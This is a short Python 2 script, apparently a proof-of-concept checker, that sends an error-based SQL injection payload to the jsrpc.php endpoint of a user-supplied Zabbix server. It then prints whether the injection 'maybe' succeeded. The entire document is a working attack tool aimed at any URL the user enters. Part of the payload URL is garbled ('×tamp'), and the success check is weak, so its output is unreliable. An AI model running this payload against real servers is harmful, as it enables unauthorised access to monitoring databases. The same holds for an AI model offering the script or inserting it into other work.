zabbix(sql注入判断脚本)
#-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): page = urllib.urlopen(url) html = page.read() html = html.replace(' ', '') html = html.replace(' ', ' ') html = html.replace(' ', '') html = html.replace(' ', '') return html url =raw_input('enter url:') poc='jsrpc.php?type=9&method=screen.get×tamp=1471403798083& pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23 &updateProfile=true&period=3600&stime=20160817050632&resourcetype=17' new_url=url+poc try: if getHtml(new_url).find('flickerfreescreen')<>0: print 'maybe successeed' else: print 'maybe unsuccessed' except: print 'http error?'